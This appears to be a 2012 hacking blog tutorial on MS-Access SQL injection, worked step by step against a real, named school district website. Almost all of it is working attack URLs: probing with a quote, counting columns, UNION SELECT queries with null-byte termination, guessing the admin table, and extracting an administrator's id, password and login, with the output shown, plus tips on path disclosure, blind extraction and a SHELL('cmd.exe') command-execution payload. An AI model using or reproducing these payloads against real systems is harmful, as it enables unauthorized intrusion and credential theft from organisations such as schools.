BASIC HACK

Sunday, 9 September 2012

MS-Access Injection

site link for this tutorial

http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151

how do we know its vuln?like regular injection,typing " ' " in the end of the value.

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151'

 error 80040e14


 first,i noticed that the there are some people that dont know why this error happens.
so explanation-
the coder expect that we use numbers only.
for example
id=10
id=7
id=234984
or letters
cat_id=index
cat_id=cars
or both
id=car1
A-Z 0-9
but he didnt expect that we use " ' "
because there is no
id=46'78
id=t'6'8'jh
so this error happens. we can type instead of " ' ",@ for example
id=1@
or ^
same principle.
after we understoond that,lets move on.
in access we can counting the columns with order/group by.


Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+68
error 80004005,there is no 68 columns in the table.

in access,-- dosent exist,so we are using null-byte (%00).
so

lets try 67
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+67
page load normal,67 columns.

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​ 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67%00
error
"Query input must contain at least one table or query."







 its ok!!
it means we are correcting at the columns count,but access db its like mysql 4,we have to guess tables and columns.
like that

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from login%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from users%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
page load normal,admin table exist.

as you can see,column 4 vuln,lets inject there.
we have to guess columns.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,username,5,6,7,8,9,10,11,12,13,14,1 ​ 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, ​ 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id,5,6,7,8,9,10,11,12,13,14,1 ​ 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, ​ 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
no error,column exist.
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_login,5,6,7,8,9,10,11,12,13,1 ​ 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, ​ 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ​ from admin%00
no error,column exist.
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14 ​ ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 ​ 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_password,5,6,7,8,9,10,11,12,1 ​ 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, ​ 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ​,67 from admin%00
no error,column exist
columns : admin_id,admin_login,admin_password.
in access,we cant use concat(),so we are using %26.
so
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id+%26+0x3a+%26+admin_passwor ​ d+%26+0x3a+%26+admin_login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 ​ 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, ​51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67+from+admin%00
 
output is:
1:Powell:Karin

some comments:
-limit dosent exist,so we are using TOP X instead.
UNION SELEC TOP 1 PASS FROM USER
-to find the full path,we are typing a false db,like that
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1+FROM+X.X
c:\windows\system32\inetsrv\X.mdb
-we can run subqueries like that
AND (SELECT TOP 1 data FROM table)%00
-for blind,instead of substring,we are using MID()
UNION SELECT MID(benzi,1,1) FROM table%00
returns b
UNION SELECT MID(benzi,2,1) FROM table%00
returns e.
-we can run shell commands like that
AND SHELL('cmd.exe /c command ')%00
if you wanna get root with shell()

but its rare that the SHELL() will be avaible,cause the admin can block this function.
-the function curdir() returns the location.
some cheat sheets
http://www.krazl.com/blog/index.php/ms-a...eat-sheet/
http://nibblesec.org/files/MSAccessSQLi/...sSQLi.html
 
hope you like this...




Posted by at
Labels:

1 comment:

Subscribe to: Post Comments (Atom)